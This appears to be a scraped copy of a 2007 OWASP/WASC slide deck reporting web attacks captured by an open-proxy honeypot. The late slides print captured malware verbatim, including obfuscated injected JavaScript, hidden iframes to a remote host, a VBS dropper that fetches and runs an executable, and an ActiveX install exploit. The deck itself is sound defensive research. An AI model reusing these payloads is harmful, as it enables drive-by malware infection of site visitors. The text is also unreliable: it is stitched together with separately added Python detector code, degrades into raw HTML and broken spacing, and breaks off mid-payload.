
  • Number of slides: 62

WASC Distributed Open Proxy Honeypot Project: Phase 2 Update on Attacks and Vulnerabilities
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
http://www.webappsec.org/
Ryan Barnett, WASC Officer
Director of Application Security Training, Breach Security
Ryan.[email protected]
Copyright © 2007 - The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/
The OWASP Foundation http://www.owasp.org/

Introduction: Ryan Barnett
• Director of Application Security Training at Breach Security.
• Background as web server administrator.
• Author of Preventing Web Attacks with Apache (Addison-Wesley, 2006).
• Open Source and Community projects:
    - Board Member, Web Application Security Consortium.
    - Project Leader, WASC Distributed Open Proxy Honeypot Project.
    - Community Manager, ModSecurity.
    - Instructor for the SANS Institute.
    - Project Leader, Center for Internet Security's Apache Benchmark.

Distributed Open Proxy Honeypot Project
• Problem: lack of "real" web attack log data.
• Goal: to identify/block/report on current web attacks.
• Method: instead of functioning as the "target" of web attacks, we run as a conduit for the attacks by operating as an open proxy server.
• Tools used: ModSecurity 2.x, Core Rules and the ModSecurity Management Appliance.
http://www.webappsec.org/projects/honeypots

Why an Open Proxy?
• There is a lack of perceived "value" in just deploying a default Apache install.
    - We would most likely only get hit by worms and automated programs scanning IP addresses.
• Bad guys use them.
    - We know that the bad guys use open proxies to loop their attacks through to hide their source IP.
• We need to function as a real open proxy and only block known malicious attacks.
    - Bad guys will test our systems prior to using them for their attacks.
    - If we don't work as a real open proxy, they will identify this from the initial probe and then not use our systems.

Typical Initial Testing

What are we reporting?
• We are presenting real, live web attack data captured "in-the-wild"

Why are we reporting this data?
• To raise public awareness about real attacks
• To

Phase 1: Active Project Sensors
• We had a total of 7 active sensor participants

Phase 2: New Active Sensors
• After Phase 1 ended (May 2007), we had several

Active Contributors
• Ivan Ristic
• Brian Rectanus
• Ofer Shezaf
• Robert Auger
• Sergey Gordeychik
• Spiros Antonatos
• Bjoern Weiland
• Kurt Grutzmacher
• Pete LeMay
• Rick Nall
• Jeremiah Grossman
• Peter Guerra
• Jehiah Czebotar
• Shaun Vlassis
• Román Medina-Heigl Hernández
• Peednas Dhamija
• Erwin Geirnaert
• Sebastian Garcia
• Bogdan Calin

Project Architecture

Central Console Dashboard

Management Console – Alert Viewer

Management Console – Transaction Search

Additional Custom Honeypot Rules
• Deny known offenders
    - Run an RBL check and block

ModSecurity Audit Logging and Traffic Categorization
• All honeypot traffic falls in one of three categories:
    - Normal: web surfing
    - Abnormal but not malicious: odd protocol manipulation by poorly written clients/spiders, load balancing by web servers and proprietary applications
    - Malicious: recon, intrusion attempts and worms
• We are logging all transactions.
    - Not just those that trigger a rule
    - How else can we identify new attacks or successful evasions?
• The majority of traffic (~3/4) did not trigger a ModSecurity rule.
    - What was this traffic?
    - Was it an attack?
    - Was it benign?
• As we move forward in Phase 2, we will be focusing more on this type of data analysis.

High-Level Statistics – October 2007
• Total number of transactions: 8,988,361
    - Number of individual transaction entries that we received
• Total number of alerts: 2,133,677
    - Number of individual alerts that triggered from one of our protection rulesets
• Total unique clients: 46,513
    - Number of remote IP addresses that directly connected to our honeypots
• Total number of clients looping through other proxy servers: 61,846
    - Number of unique IP addresses that were identified in X-Forwarded-For request headers
• Total unique targets: 171,688
    - Number of destination websites

Top Trends
• Banner-Ad/Click Fraud generated the most traffic
    - ~2,625,522 requests (click, banner and ad words in URL)
• SPAMMERS are the #2 users of open proxy servers
    - HTTP CONNECT method requests to have the proxy connect directly to remote SMTP hosts
    - Automated programs to post their SPAM messages to user forums, etc.
• The majority of web attacks are automated
    - This increases the need for anti-automation defenses
• Information leakage is a huge problem
    - Too many websites are configured to provide verbose error messages to clients
• Attackers are looking for easy targets
    - Pick a vulnerability -> Find a site
    - Instead of: Pick a site -> Find a vulnerability
• Attackers are utilizing proxy chaining
    - This makes source tracebacks extremely difficult

Top 5 ModSecurity Attack Categories

Top Attacks Identified by the Honeypot Rules
Rule Message (# of Requests)
Request Missing a Host Header (575,928)
CONNECT Request Missing a User Agent Header (415,103)
Request Missing an Accept Header (277,566)
Host header is a numeric IP address (130,314)
UTF8 Encoding Abuse Attack Attempt (93,579)
Client Denied by RBL Check (11,275)
Client Denied Due to Excessive Basic Authentication Failures (3,184)
Request Indicates an automated program explored the site (2,792)
URL Encoding Abuse Attack Attempt (2,613)
SQL Injection Attack (530)
Google robot activity (499)
example robot activity (404)
IIS Information Leakage (345)
HTTP Response Splitting Attack. Matched signature <%0d> (343)
SQL Information Leakage (282)
URL file extension is restricted by policy (264)
Visa Credit Card Number sent from site to user (241)
Request Indicates a Security Scanner Scanned the Site (109)
PHP source code leakage (107)
Request Body Parsing Failed. Multipart: Final boundary missing. (99)
Cross-site Scripting (XSS) Attack (94)
System Command Injection (90)

WASC Web Security Threat Classification: Attacks and Vulnerabilities Identified
1 Authentication
    1.1 Brute Force
    1.2 Insufficient Authentication
    1.3 Credential/Session Prediction
2 Authorization
    2.1 Insufficient Authorization
    2.2 Insufficient Session Expiration
    2.3 Session Fixation
3 Client-side Attacks
    3.1 Content Spoofing
    3.2 Cross-site Scripting/Malicious Code Injection
4 Command Execution
    4.5 SQL Injection
5 Information Disclosure
    5.2 Information Leakage
6 Logical Attacks
    5.2 Insufficient Anti-Automation

Brute Force Attack
A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key. We will discuss the following attacks:
• HEAD Method Scanning
    - Brute forcing porn sites
• GET Method Logins Scanning
    - Distributed reverse brute force scans against example

HEAD Request Method Scanning
• The request uses HEAD to increase the speed of responses (as the web server does not have to send back the response body)
• The request includes the Authorization header with the Base64-encoded credentials
• The goal is to look for an HTTP response status code other than 401 (most often a 200 or 302)

GET Method Logins
• This authentication method passes user credentials on the URL line as arguments instead of using Authorization or Cookie headers
• This type of authentication is considered less secure, as the login data can be easily captured in standard log file formats (thus increasing disclosure)
• Reverse Brute Force Scan
    - The attacker is cycling through different usernames and then repeating the same target password of "james"
GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0
GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0
GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0
GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0
GET http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0
GET http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0

Distributed Scanning
• The attacker is distributing the scan across multiple example domains
• This may help to reduce the likelihood of identification of the attacks and/or may not cause account lockouts
GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0
GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0
GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0
GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0
GET http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0
GET http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0

Identifying Correct Credentials
• Failed Authentication
    - Produces a 200 Status Code
    - HTML Text

Distributed Scanning Part 2
• Same distributed reverse scanning concept.
• They are targeting a different authentication application.
    - In this example they are using the "verify_user" application
    - The response data is easier to parse (next slide)
GET http://xxx.238/verify_user?l=kevinduffy99&p=mischa HTTP/1.0
GET http://xxx.34/verify_user?l=keziboy&p=mischa HTTP/1.0
GET http://xxx.85/verify_user?l=dowfla&p=mischa HTTP/1.0
GET http://xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
GET http://xxx.223/verify_user?l=corruptu_2000&p=mischa HTTP/1.0
GET http://xxx.28/verify_user?l=krdewey01&p=mischa HTTP/1.0
GET http://xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
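The reverse scans in the two request listings above (login/passwd against example domains, l/p against verify_user) stand out in a proxy log once requests are grouped by the password value rather than by username or target host. The detector below is an added example, not part of the presentation or of ModSecurity; the log sample is constructed from the slides' requests, and the three-username threshold is an assumption.

```python
"""Detect distributed reverse brute-force login scans in proxy logs.

Added example, not part of the WASC presentation. A reverse brute force
replays one password against many usernames; distributing it across
target hosts hides it from per-site lockouts. Grouping requests by the
password value surfaces it. Parameter names are taken from the slides;
the log sample is constructed.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# (username param, password param) pairs used by the two login
# applications on the slides. Assumption: other apps are out of scope.
CREDENTIAL_PARAMS = (("login", "passwd"), ("l", "p"))

# Constructed sample proxy log, "METHOD URL HTTP-version" per line.
SAMPLE_LOG = """\
GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0
GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0
GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0
GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0
GET http://xxx.238/verify_user?l=kevinduffy99&p=mischa HTTP/1.0
GET http://xxx.34/verify_user?l=keziboy&p=mischa HTTP/1.0
GET http://xxx.85/verify_user?l=dowfla&p=mischa HTTP/1.0
GET http://xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
GET http://xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
GET http://www.example.com/login?.patner=sbc&login=alice&passwd=s3cret&.save=1 HTTP/1.0
GET http://www.example.com/index.html HTTP/1.0
"""


def extract_credentials(url):
    """Return (host, username, password) for a GET login URL, else None."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    for user_key, pass_key in CREDENTIAL_PARAMS:
        if user_key in qs and pass_key in qs:
            return parts.hostname, qs[user_key][0], qs[pass_key][0]
    return None


def find_reverse_brute_force(log_text, min_users=3):
    """Group GET logins by password and report each password tried against
    at least `min_users` distinct usernames, most requests first."""
    by_password = defaultdict(lambda: {"users": set(), "hosts": set(), "requests": 0})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 2 or fields[0] != "GET":
            continue
        creds = extract_credentials(fields[1])
        if creds is None:
            continue
        host, user, password = creds
        entry = by_password[password]
        entry["users"].add(user)
        entry["hosts"].add(host)
        entry["requests"] += 1

    findings = []
    for password, e in by_password.items():
        if len(e["users"]) >= min_users:
            findings.append({
                "password": password,
                "distinct_users": len(e["users"]),
                "distinct_hosts": len(e["hosts"]),
                "requests": e["requests"],
                # More than one target host means the scan is distributed
                "distributed": len(e["hosts"]) > 1,
            })
    return sorted(findings, key=lambda f: -f["requests"])


if __name__ == "__main__":
    for finding in find_reverse_brute_force(SAMPLE_LOG):
        print(finding)
```

A single user's legitimate login with its own password never reaches the threshold, so only the replayed passwords ("james", "mischa") are reported.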

Account Enumeration
• SPAMMERS can use this technique to enumerate valid example accounts
    - To send SPAM to
    - To try and hijack accounts
• Failed Username
    - ERROR:102:Invalid Login
• Failed Password
    - ERROR:101:Invalid Password
• Correct Authentication
    - OK:0:username
• Attackers successfully enumerated 2 accounts
    - OK:0:skaterman6
    - OK:0:[email protected]

Insufficient Authentication occurs when a web site permits an attacker to access sensitive content or functionality without having to properly authenticate.
Example: accessing an "admin" function by passing the username in the URL. Clients do not need to log in or submit authorization cookies.
GET http://www.example.com/english/book/book.php?page=781&block=776&admin=0 HTTP/1.0
--CUT--

Credential/Session Prediction is a method of hijacking or impersonating a web site user. The common attack sequence is:
1. Attacker connects to the web application, acquiring the current session ID
2. Attacker calculates or brute forces the next session ID
3. Attacker switches the current value in the cookie/hidden form field/URL and assumes the identity of the next user

No Encryption/Clear-Text Cookie Data
• These are examples of session/cookie data sent from applications to clients
• Since there is no encryption or hashing of the data, attackers can easily alter it (such as incrementing/decrementing the digits) to attempt to take over another user's session
Set-Cookie: guestID=413;
Set-Cookie: CurrentSessionCookie=212035755652;
Set-Cookie: CFID=3937042; expires=Thu,
Set-Cookie: Referer=/gate/gb/www.example.com/; Path=/
Set-Cookie: mgUser=1|76ab0352df45407e8033a4faf5d7b0be|64.5.128.103|1192250622159|1; Domain=.example.com; Expires=Mon, 12-Nov-2007 04

Insufficient Entropy
• These cookie values are not random enough to prevent guessing attacks
• The

Insufficient Encryption
• Unfortunately, sensitive data is often passed within the cookie header data and is not sufficiently protected with strong encryption
• Fake or weak protection is often used, such as Base64 encoding
    - Set-Cookie: cpg132_data=YTozOntzOjI6IklEIjtzOjMyOiI0YTA4YTQwNjNiZjM2ZTc2NjAwMjE2NDRkMDE3NjdjZiI7czoyOiJhbSI7aToxO3M6NDoibmFtZSI7czo0OiJBbm9uIjt9
    - Set-Cookie: cpg132_data=a:3:{s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf";s:2:"am";i:1;s:4:"name";s:4:"Anon";}

Insufficient Authorization is when a web site permits access to sensitive content or functionality that should require increased access control restrictions.
• The cookie in the previous example contained a valid sessionid hash and then a username; however, poorly written applications often do not make a connection between the valid sessionid and the username
• What happens if an attacker alters portions of the cookie value and changes the username?
    - Set-Cookie: cpg132_data=a:3:{s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf";s:2:"am";i:1;s:4:"name";s:5:"Admin";}

Insufficient Authorization: Web Defacements
HTTP PUT method
--6aa02c14-B--
PUT http://www.example.com/scorpion.txt HTTP/1.0
Accept-Language: pt-br, en-us;q=0.5
Translate: f
Content-Length: 36
User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1
Host: www.example.com
Pragma: no-cache
--6aa02c14-C--
1923 Turk CyberscorpioN ownz your box

Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.
• No expiration date/time specified
Set-Cookie: phpbb2mysql_sid=9ff3b118fbbf63e088c99d09d810e311; path=/; domain=d M Y, G.i
• Expiration date/time is too long
Set-Cookie: cpvr=3cc2d13f-1b27-4c11-a277-b3cb77bf33e3; domain=example.com; expires=Sun, 16-Jan-2107 12:27:36 GMT; path=/

Insufficient Session Expiration Continued
• It is also important to note that proper session expiration means expiring, invalidating or deleting the sessionid in BOTH the web browser and the web application
• Poorly written web applications only attempt to expire or delete the cookie from the web browser
    - Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00 GMT; path=/; domain=.example.com
• Remember: you do not own the browser!
• These cookies can potentially be sent back to the web application
• Will they let the user back in?

Other Cookie Issues
• Minimal use of "HttpOnly" and "Secure" cookie protections
• HttpOnly helps to prevent cookies from being read by client-side scripting
Set-Cookie: ASP.NET_SessionId=prqc4d2slpwo3c45yixtbo55; path=/; HttpOnly
• Secure will ensure that the cookie is only sent to an SSL-enabled site
Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Wed, 16-Jan-2008 19:57 GMT; path=/; secure
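The cookie weaknesses covered on the last six slides (clear-text and numeric values, Base64 as "encryption", missing or century-long expiry, missing HttpOnly and Secure flags) can all be checked from the Set-Cookie header alone. The auditor below is an added example, not part of the presentation or of ModSecurity; it is run over the slides' own cookies with the extraction garbling removed, and the one-year expiry cut-off and the 1 Nov 2007 reference date are assumptions.

```python
"""Audit Set-Cookie headers for the weaknesses shown on the cookie slides.

Added example, not from the WASC presentation or ModSecurity. It flags:
a missing HttpOnly or Secure flag, no expiry or an expiry far in the
future, numeric or short values that invite guessing, and Base64 or
URL-encoded values that only encode (never encrypt) structured data.
Assumptions: the one-year cut-off and the 1 Nov 2007 reference date.
"""
import base64
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

MONTHS = {m: i for i, m in enumerate(
    "jan feb mar apr may jun jul aug sep oct nov dec".split(), 1)}
# "16-Jan-2107 12:27:36", "01 Jan 1970 22:00" and similar Expires values.
DATE_RE = re.compile(
    r"(\d{1,2})[- ]([A-Za-z]{3})[- ](\d{4})\s+(\d{1,2}):(\d{2})(?::(\d{2}))?")
SERIALIZED_RE = re.compile(r"^[aOs]:\d+:")  # PHP serialize() output
CONFERENCE_DATE = datetime(2007, 11, 1, tzinfo=timezone.utc)


def parse_expires(text):
    """Parse an Expires attribute; None if unparseable (e.g. truncated)."""
    m = DATE_RE.search(text)
    if not m or m.group(2).lower() not in MONTHS:
        return None
    d, mon, y, hh, mm, ss = m.groups()
    return datetime(int(y), MONTHS[mon.lower()], int(d), int(hh), int(mm),
                    int(ss or 0), tzinfo=timezone.utc)


def decoded_plaintext(value):
    """If the value is URL- or Base64-encoded PHP-serialized data, return
    the readable decoded form; otherwise None."""
    candidates = [unquote(value)]
    try:
        candidates.append(base64.b64decode(value, validate=True).decode("ascii"))
    except ValueError:  # bad alphabet/padding, or non-ASCII bytes
        pass
    for text in candidates:
        if text != value and text.isprintable() and SERIALIZED_RE.match(text):
            return text
    return None


def audit_set_cookie(header, now=CONFERENCE_DATE, max_age=timedelta(days=365)):
    """Return [(cookie_name, finding), ...] for one Set-Cookie header."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()

    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable by client-side script")
    if "secure" not in attrs:
        findings.append("no Secure: will be sent over plain HTTP")
    if "expires" not in attrs and "max-age" not in attrs:
        findings.append("no expiry specified")
    elif "expires" in attrs:
        exp = parse_expires(attrs["expires"])
        if exp is None:
            findings.append("unparseable Expires value")
        elif exp - now > max_age:
            findings.append("expiry too far in the future (%d days)" % (exp - now).days)
    plain = decoded_plaintext(value)
    if plain is not None:
        findings.append("encoded, not encrypted; decodes to " + plain)
    elif value.isdigit():
        findings.append("numeric-only value: trivially incremented or decremented")
    elif len(value) < 16:
        findings.append("short value: too little entropy for a session token")
    return [(name, f) for f in findings]


# Cookies from the slides, with the extraction garbling removed.
SAMPLE_HEADERS = [
    "Set-Cookie: guestID=413;",
    "Set-Cookie: CurrentSessionCookie=212035755652;",
    "Set-Cookie: cpg132_data=YTozOntzOjI6IklEIjtzOjMyOiI0YTA4YTQwNjNiZjM2ZTc2NjAw"
    "MjE2NDRkMDE3NjdjZiI7czoyOiJhbSI7aToxO3M6NDoibmFtZSI7czo0OiJBbm9uIjt9",
    "Set-Cookie: cpvr=3cc2d13f-1b27-4c11-a277-b3cb77bf33e3; domain=example.com; "
    "expires=Sun, 16-Jan-2107 12:27:36 GMT; path=/",
    "Set-Cookie: ASP.NET_SessionId=prqc4d2slpwo3c45yixtbo55; path=/; HttpOnly",
    "Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; "
    "expires=Wed, 16-Jan-2008 19:57 GMT; path=/; secure",
]


def audit_all(headers, now=CONFERENCE_DATE):
    """Run the audit over a list of Set-Cookie headers."""
    return [f for h in headers for f in audit_set_cookie(h, now)]


if __name__ == "__main__":
    for cookie, finding in audit_all(SAMPLE_HEADERS):
        print("%-22s %s" % (cookie, finding))
```

The Base64 cpg132_data value decodes back to the serialized PHP array shown on the slide, which is the whole point of the "fake protection" bullet.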

Session Fixation is an attack technique that forces a user's session ID to an explicit value.
• While we did not see direct evidence of Session Fixation, we did see web applications that allowed sessionid information to be passed on the URL, which makes a session fixation attack easier to execute by including these web links within emails sent to target victims:
POST http://www.example.com/joinSubmitAction.do;jsessionid=DF4B9604ED1467DFECD4BDA7452E23D9 HTTP/1.1
POST http://www.example.com/account/login.php;sessionid=6d0e2a51c515cb5b877bae03972a0a78 HTTP/1.1

Content Spoofing is an attack technique used to trick a user into believing that Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a web site is legitimate and not from an external source. < We ran into an interesting Blog defacement < It uses Javascript in the following manner 4 Opens an alert box 4 Opens a document. window to displays an alternative page from a remote site OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-41.jpg" alt="Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov" /> Javascript Defacement OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. write(unescape('%3" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-42.jpg" alt="Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. write(unescape('%3" /> Additional Obfuscated Javascript: Injected at the bottom of the page <Script Language='Javascript'> <!-document. 
write(unescape('%3 C%73%63%72%69%70%74%3 E%0 D%0 A%3 C%21%2 D %2 D%0 D%0 A%64%6 F%63%75%6 D%65%6 E%74%2 E%77%72%69%74%65%28 %75%6 E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70 %74%25%33%45%25%30%44%25%30%41%25%33%43%25%32%31%2 D%2 D %25%30%44%25%30%41%64%6 F%63%75%6 D%2 D%25%32%35%30%44%25 %32%35%30%41%64%6 F%63%75%6 D%65%6 E%74%2 E%77%72%69%74%65 %25%32%38%75%6 E%65%73%63%61%70%65%25%32%38 %25%32%35%32% --CUT— %35%30%41%25%32%35%33%43%2 F%73%63%72%69%70%74%25 %32%35%33%45%25%32%32%25%32%39%25%32 %35%32%39%25%32%35%33%42%25%32%35%30%44%25%32%35%30%41 %2 F%2 F%2 D%2 D%25%32%35%33%45%25%32%35%30%44%25%32%35%30 %41%25%32%35%33%43%2 F%73%63%72%69%70%74%25%32%35%33%45 %25%32%32%25%32%39%25%33%42%25%30%44%25%30%41 %2 F%2 F%2 D%2 D%25%33%45%25%30%44%25%30%41%25%33%43%2 F%73 %63%72%69%70%74%25%33%45%22%29%29%3 B%0 D%0 A%2 F%2 F%2 D%2 D %3 E%0 D%0 A%3 C%2 F%73%63%72%69%70%74%3 E')); //--> </Script> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-43.jpg" alt="URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost" /> URL Decoded Javascript <!-document. write(unescape('<script> <!-document. write(unescape("<script> <!-document. write(unescape("<iframe width="0" height="0" src="http: //royy. byethost 7. com/url. htm" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="bicho. wml" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="bicho. 
htm" scrolling="no" frameborder="0"></iframe> <iframe width="0" height="0" src="embed. htm" scrolling="no" frameborder="0"></iframe>")); //--> </script>")); //--> </script>')); //--> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System." src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-44.jpg" alt="bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System." /> bicho. htm – Attempted VBS Malware Install tf = fso. Create. Text. File(c. System. Dir + "runit. vbs", true); //tf = fso. Create. Text. File("c: \runit. vbs", true); tf. Write. Line("On Error Resume Next"); tf. Write. Line("URL = "http: //rzone. com. ar/x. D. exe""); tf. Write. Line("Set xml = Create. Object("Microsoft. XMLHTTP")"); tf. Write. Line("xml. Open "GET", URL, False"); tf. Write. Line("xml. Send"); tf. Write. Line("set o. Stream = createobject("Adodb. Stream")"); tf. Write. Line("o. Stream. type = 1"); tf. Write. Line("o. Stream. open"); tf. Write. Line("o. Stream. write xml. response. Body"); tf. Write. Line("o. Stream. savetofile "" + c. System. Dir + "x. D. exe", 1"); tf. Write. Line("o. Stream. close"); tf. Write. Line("set o. Stream = nothing"); tf. Write. Line("Set xml = Nothing"); tf. Write. Line("Set o. Shell = createobject("WScript. Shell")"); tf. Write. Line("o. Shell. run "" + c. System. Dir + "x. D. exe", 1, false"); tf. Close(); obj. Shell. run(""" + c. System. Dir + "runit. vbs""); OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Embed. htm – Attempted Active. 
X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012"" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-45.jpg" alt="Embed. htm – Attempted Active. X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012"" /> Embed. htm – Attempted Active. X Malware Install <object name="x" classid="clsid: 12345678 -1234 -123456789012" codebase="mhtml: file: //C: NO_SUCH_MHT. MHT !http: //www. rzone. com. ar/x. D. exe"> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-46.jpg" alt="More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting" /> More Javascript Malware Injections: A Serious Problem… <There are many websites that are injecting malicious javascript into legitimate webpages. <The javascript may be injected either by remote attackers or by the website owner themselves. <Beware of what site you visit. <Recommend using “sandboxed” browsers as throw-away sessions. 4 VMware images 4 Applications such as Sandboxie http: //www. sandboxie. com/ OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-47.jpg" alt="Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php" /> Honeypot Example: Client visits Proxy. Checker site POST http: //www. example. com/boyter/Check. Proxy. php HTTP/1. 
0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4. 0 (compatible; MSIE 6. 0; Windows NT 5. 1) Content-Type: application/x-www-form-urlencoded Host: www. example. com Content-Length: 21 seed=9 D 3 BFF 73 E 33871 B 5 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2." src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-48.jpg" alt="Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2." /> Proxy. Checker Response HTTP/1. 1 200 OK Notice: Subject to Monitoring X-Powered-By: PHP/5. 2. 0 Content-Type: text/html Via: 1. 0 debian. localdomain Content-Length: 4080 Connection: close Hmm… looks like there should be moe data? ? ? hash=9 D 3 BFF 73 E 33871 B 5 REMOTE_ADDR=70. 187. 221. 243 HTTP_VIA=1. 0 debian. localdomain HTTP_X_FORWARDED_FOR= OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-49.jpg" alt="Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7" /> Here Comes the Javascript! <!--[O]-><script>document. write(unescape("%3 Cscript%3 Etry%20%7 Bvar%20 zl%3 D%27 KKu. K 7 u. KNu. KUu. Kdu. Kwu. Keu. Ki u. KHu. KMu. Kzu. Kau. Kcu. KVu. KWu. Knu. KGu. Kbu. Kgu. Klu. K 6 u. Ksu. KOu. KTu. Kpu. Kru. Kku. K 4 u. Kxu. KDu. K 5 u. KJu. K 8 u. Kju. KIu. K 3 u. Khu. K mu. Kfu. KSu. Kou. KPu. KBu. KLu. 
